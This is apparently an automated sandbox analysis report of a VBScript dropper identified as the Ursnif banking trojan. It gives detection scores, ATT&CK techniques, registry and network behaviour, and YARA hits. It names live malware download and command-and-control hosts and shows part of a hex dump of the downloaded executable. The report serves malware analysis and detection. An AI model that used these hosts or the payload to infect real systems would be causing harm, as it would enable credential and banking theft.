Play interactive tour

Edit tour

Analysis Report Nuovo documento 1.vbs

Overview

General Information

Joe Sandbox Version:	28.0.0 Lapis Lazuli
Analysis ID:	224946
Start date:	23.04.2020
Start time:	20:11:26
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Nuovo documento 1.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winVBS@35/66@14/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 7.4% (good quality ratio 7.4%) Quality average: 88.6% Quality standard deviation: 20.2%
HCA Information:	Successful, ratio: 82% Number of executed functions: 49 Number of non-executed functions: 23
Cookbook Comments:	Adjust boot time Enable AMSI Start process as user (medium integrity level) Found application associated with file extension: .vbs
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, dllhost.exe, ielowutil.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe Excluded IPs from analysis (whitelisted): 2.18.68.82, 205.185.216.42, 205.185.216.10, 104.76.47.40, 152.199.19.161, 23.61.220.90 Excluded domains from analysis (whitelisted): fs.microsoft.com, ie9comview.vo.msecnd.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, site-cdn.onenote.net.edgekey.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e5684.g.akamaiedge.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, go.microsoft.com.edgekey.net, prod.fs.microsoft.com.akadns.net, cs9.wpc.v0cdn.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtQueryVolumeInformationFile calls found.

Detection

Strategy	Score	Range	Reporting	Whitelisted	Threat	Detection
Threshold	100	0 - 100		false	Ursnif

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification Spiderchart

Analysis Advice

Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation21	Scheduled Task1	Process Injection112	Software Packing21	Input Capture1	System Time Discovery1	Remote File Copy12	Input Capture1	Data Encrypted1	Remote File Copy12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Replication Through Removable Media	PowerShell1	Port Monitors	Scheduled Task1	Disabling Security Tools1	Network Sniffing	Account Discovery1	Remote Services	Data from Removable Media	Exfiltration Over Other Network Medium	Standard Cryptographic Protocol12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
External Remote Services	Scripting21	Accessibility Features	Path Interception	Deobfuscate/Decode Files or Information1	Input Capture	Security Software Discovery21	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Standard Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Drive-by Compromise	Execution through API3	System Firmware	DLL Search Order Hijacking	Scripting21	Credentials in Files	File and Directory Discovery1	Logon Scripts	Input Capture	Data Encrypted	Standard Application Layer Protocol13	SIM Card Swap		Premium SMS Toll Fraud
Exploit Public-Facing Application	Exploitation for Client Execution1	Shortcut Modification	File System Permissions Weakness	Obfuscated Files or Information2	Account Manipulation	System Information Discovery23	Shared Webroot	Data Staged	Scheduled Transfer	Standard Cryptographic Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Spearphishing Link	Graphical User Interface1	Modify Existing Service	New Service	Masquerading1	Brute Force	Query Registry1	Third-party Software	Screen Capture	Data Transfer Size Limits	Commonly Used Port	Jamming or Denial of Service		Abuse Accessibility Features
Spearphishing Attachment	Scheduled Task1	Path Interception	Scheduled Task	Virtualization/Sandbox Evasion2	Two-Factor Authentication Interception	Virtualization/Sandbox Evasion2	Pass the Hash	Email Collection	Exfiltration Over Command and Control Channel	Uncommonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Spearphishing via Service	Third-party Software	Logon Scripts	Process Injection	Process Injection112	Bash History	Process Discovery2	Remote Desktop Protocol	Clipboard Data	Exfiltration Over Alternative Protocol	Standard Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Supply Chain Compromise	Rundll32	DLL Search Order Hijacking	Service Registry Permissions Weakness	Process Injection	Input Prompt	Application Window Discovery1	Windows Admin Shares	Automated Collection	Exfiltration Over Physical Medium	Multilayer Encryption	Rogue Cellular Base Station		Data Destruction
Trusted Relationship	PowerShell	Change Default File Association	Exploitation for Privilege Escalation	Scripting	Keychain	System Owner/User Discovery1	Taint Shared Content	Audio Capture	Commonly Used Port	Connection Proxy			Data Encrypted for Impact
Hardware Additions	Execution through API	File System Permissions Weakness	Valid Accounts	Indicator Removal from Tools	Private Keys	Remote System Discovery1	Replication Through Removable Media	Video Capture	Standard Application Layer Protocol	Communication Through Removable Media			Disk Structure Wipe

Signature Overview

Click to jump to signature section

AV Detection:

Multi AV Scanner detection for domain / URL

Show sources

Source: http://rolandojgarcia.com/pagigpy75.php

Virustotal: Detection: 10%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: Nuovo documento 1.vbs	Virustotal: Detection: 10%			Perma Link
Source: Nuovo documento 1.vbs	ReversingLabs: Detection: 12%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Show sources

Source: 4.2.PaintHelper.exe.710000.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.PaintHelper.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Spreading:

Creates COM task schedule object (often to register a task for autostart)

Show sources

Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Networking:

Downloads executable code via HTTP

Show sources

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 23 Apr 2020 18:13:25 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 845368Content-Disposition: attachment; filename=2_exx.binKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 63 73 a1 5e 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 96 01 00 00 3e 0b 00 00 00 00 00 a0 9a 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 0d 00 00 04 00 00 ee f7 0c 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 c4 0c 00 a0 00 00 00 00 e0 0c 00 e0 22 00 00 00 00 00 00 00 00 00 00 00 d8 0c 00 38 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 c7 0c 00 c4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 63 95 01 00 00 10 00 00 00 96 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 08 01 0b 00 00 b0 01 00 00 02 0b 00 00 9a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e0 16 00 00 00 c0 0c 00 00 18 00 00 00 9c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 22 00 00 00 e0 0c 00 00 24 00 00 00 b4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Internet Provider seen in connection with other malware

Show sources

Source: Joe Sandbox View

ASN Name: unknown unknown

JA3 SSL client fingerprint seen in connection with other malware

Show sources

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Downloads files

Show sources

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\C

Jump to behavior

Downloads files from webservers via HTTP

Show sources

Source: global traffic

HTTP traffic detected: GET /pagigpy75.php HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: SanAntonioHost: rolandojgarcia.com

Found strings which match to known social media urls

Show sources

Source: msapplication.xml1.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x665a6569,0x01d619e6</date><accdate>0x665a6569,0x01d619e6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x665a6569,0x01d619e6</date><accdate>0x665a6569,0x01d619e6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x66625dfb,0x01d619e6</date><accdate>0x66625dfb,0x01d619e6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x66625dfb,0x01d619e6</date><accdate>0x66625dfb,0x01d619e6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6664e69a,0x01d619e6</date><accdate>0x6664e69a,0x01d619e6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6664e69a,0x01d619e6</date><accdate>0x66675b7d,0x01d619e6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: rolandojgarcia.com

Urls found in memory or binary data

Show sources

Source: wscript.exe, 00000000.00000003.698903893.000002A5A1CBC000.00000004.00000001.sdmp, PaintHelper.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: wscript.exe, 00000000.00000003.698903893.000002A5A1CBC000.00000004.00000001.sdmp, PaintHelper.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: wscript.exe, 00000000.00000003.698903893.000002A5A1CBC000.00000004.00000001.sdmp, PaintHelper.exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: wscript.exe, 00000000.00000003.698787006.000002A59A69C000.00000004.00000001.sdmp	String found in binary or memory: http://rolandojgarcia.com/
Source: wscript.exe, 00000000.00000003.698787006.000002A59A69C000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.715171781.000002A59A6E6000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.698583864.000002A59A6E5000.00000004.00000001.sdmp	String found in binary or memory: http://rolandojgarcia.com/pagigpy75.php
Source: wscript.exe, 00000000.00000003.698787006.000002A59A69C000.00000004.00000001.sdmp	String found in binary or memory: http://rolandojgarcia.com/pagigpy75.php2
Source: wscript.exe, 00000000.00000003.712803748.000002A59C860000.00000004.00000001.sdmp	String found in binary or memory: http://rolandojgarcia.com/pagigpy75.php:
Source: wscript.exe, 00000000.00000003.712104779.000002A59A61B000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.714791320.000002A59A61C000.00000004.00000001.sdmp	String found in binary or memory: http://rolandojgarcia.com/pagigpy75.phpO5?
Source: wscript.exe, 00000000.00000003.712104779.000002A59A61B000.00000004.00000001.sdmp	String found in binary or memory: http://rolandojgarcia.com/pagigpy75.php_______Set
Source: msapplication.xml.7.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.7.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml3.7.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.7.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.7.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.7.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.7.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.7.dr	String found in binary or memory: http://www.youtube.com/
Source: PaintHelper.exe, 00000004.00000003.714383775.00000000033E0000.00000004.00000040.sdmp	String found in binary or memory: https://barecao.xyz
Source: imagestore.dat.7.dr	String found in binary or memory: https://barecao.xyz/favicon.ico
Source: PaintHelper.exe, 00000004.00000003.879173344.0000000000887000.00000004.00000001.sdmp, PaintHelper.exe, 00000004.00000002.993292410.0000000000D90000.00000002.00000001.sdmp, ~DF4F1F8F6F4B10894B.TMP.7.dr	String found in binary or memory: https://barecao.xyz/index.htm
Source: {A7B24F44-85D9-11EA-AAE5-44C1B3FB757B}.dat.7.dr	String found in binary or memory: https://barecao.xyz/index.htmRoot
Source: {A7B24F44-85D9-11EA-AAE5-44C1B3FB757B}.dat.7.dr	String found in binary or memory: https://barecao.xyz/index.htmdex.htm
Source: wscript.exe, 00000000.00000003.698903893.000002A5A1CBC000.00000004.00000001.sdmp, PaintHelper.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0C

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.714383775.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719495034.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716679919.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.714965520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716504979.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720170005.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.713227207.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715552523.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716343079.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.709062333.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719801339.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.710475610.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719652778.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.713639378.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720057377.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719930329.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715968226.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.714019466.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.712856726.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.798832924.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715250270.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715740770.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.711519545.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719176551.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.711997884.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716177520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.708287654.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.994090175.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720225537.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.711015828.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.709810981.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.712422696.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.714678858.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720304550.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PaintHelper.exe PID: 4196, type: MEMORY

Creates a DirectInput object (often for capturing keystrokes)

Show sources

Source: PaintHelper.exe, 00000004.00000002.993083088.0000000000800000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.714383775.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719495034.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716679919.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.714965520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716504979.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720170005.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.713227207.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715552523.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716343079.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.709062333.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719801339.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.710475610.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719652778.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.713639378.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720057377.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719930329.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715968226.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.714019466.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.712856726.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.798832924.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715250270.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715740770.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.711519545.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719176551.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.711997884.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716177520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.708287654.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.994090175.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720225537.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.711015828.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.709810981.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.712422696.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.714678858.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720304550.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
